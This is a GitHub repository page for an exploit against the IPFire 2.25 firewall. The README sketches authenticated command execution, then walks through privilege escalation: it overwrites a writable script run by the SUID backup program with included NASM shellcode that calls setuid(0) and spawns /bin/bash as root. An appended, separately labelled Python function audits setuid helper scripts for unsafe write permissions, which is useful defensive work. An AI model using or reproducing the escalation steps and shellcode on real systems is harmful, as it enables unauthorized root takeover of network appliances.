https://github.com/kaanaryoverflow/ipfire-2-25-auth-rce
ipfire 2.25 authenticated remote code execution
- Host: GitHub
- URL: https://github.com/kaanaryoverflow/ipfire-2-25-auth-rce
- Owner: KaanaryOverFlow
- Created: 2021-05-14T21:15:53.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2021-06-15T12:59:39.000Z (about 4 years ago)
- Last Synced: 2025-02-05T18:06:04.263Z (5 months ago)
- Topics: exploit, ipfire, rce
- Language: Ruby
- Homepage:
- Size: 59.6 KB
- Stars: 2
- Watchers: 3
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# IPFire 2.25 (core update 156) authenticated RCE
- The system runs a command when any package is installed.

- The system gets 7zip from just the HTML.

- Then check the tmp directory.

- Version: 2.25 - core update 156.

- IPFire allows running arbitrary OS commands as nobody after login.
# Be root!
- Check the SUID binaries.

- The backup program runs another script, /var/ipfire/backup/bin/backup.pl (it is a bash script and the permissions look good).

- Try writing to the bash script. (No error. GOOD!)

- Try running bash.

- Yes, we can run it, but it is low-privileged. We must trigger setuid(0)!
- Save this and run `alti name.asm q`.
- alti is my own compile-check program in the soo_deep repo.

```nasm
bits 64
section .data
string db "/bin/bash",0x00
olmadis db "basarisiz.",0x0a,0x00   ; failure message ("basarisiz" = "failed")
olmadil equ $-olmadis
section .text
global main
main:
; setuid(0): syscall 105
mov rax,105
mov rdi,0
syscall
cmp rax,0
je getbash
; setuid failed: write(1, olmadis, olmadil)
mov rax,1
mov rdi,1
mov rsi,olmadis
mov rdx,olmadil
syscall
; exit(0): syscall 60
mov rax,60
xor rdi,rdi
syscall
getbash:
; execve("/bin/bash", NULL, NULL): syscall 59
mov rax,59
mov rdi,string
mov rsi,0
mov rdx,0
syscall
```

- Then write the new program to /var/ipfire/backup/bin/backup.pl. (We can use a Python HTTP server and curl to write it.)
- And enjoy the root shell!
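
The escalation described above depends on a script that a setuid program executes being writable by the unprivileged web user. As an added example (not part of the original README or of IPFire), this Python check flags a helper script, or any directory above it, that is not owned by a trusted uid or is group/world-writable; `audit_helper`, `stop_at` and the temporary directory layout in `demo()` are assumptions made for illustration.

```python
import os
import stat
import tempfile
from pathlib import Path


def audit_helper(path, trusted_uids=frozenset({0}), stop_at="/"):
    """Return (path, reason) findings for a script run by a setuid program.

    The script and every directory up to stop_at must be owned by a trusted
    uid and must not be group/world-writable (sticky directories excepted).
    """
    target = Path(path).resolve()
    stop = Path(stop_at).resolve()
    chain = [target]
    for parent in target.parents:
        chain.append(parent)
        if parent == stop:
            break
    findings = []
    for p in chain:
        st = p.stat()
        if st.st_uid not in trusted_uids:
            findings.append((str(p), f"owned by untrusted uid {st.st_uid}"))
        loose = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        sticky = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
        if loose and not sticky:
            findings.append((str(p), f"writable by group/other: {stat.filemode(st.st_mode)}"))
    return findings


def demo():
    """Constructed layout: a helper script with a weak mode, then a fixed one."""
    base = tempfile.mkdtemp()
    bindir = Path(base, "backup", "bin")
    bindir.mkdir(parents=True)
    os.chmod(bindir.parent, 0o755)
    os.chmod(bindir, 0o755)
    script = bindir / "backup.pl"
    script.write_text("#!/bin/bash\n")
    trusted = {os.getuid()}            # stands in for root in this sandbox
    os.chmod(script, 0o666)            # weak: anyone may rewrite the helper
    weak = audit_helper(script, trusted, stop_at=base)
    os.chmod(script, 0o755)            # corrected: only the owner may write
    fixed = audit_helper(script, trusted, stop_at=base)
    return weak, fixed


if __name__ == "__main__":
    for label, result in zip(("weak", "fixed"), demo()):
        print(label, result)
```

On a real host, call `audit_helper` with the default `trusted_uids` (root only) on each script that a setuid wrapper executes.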
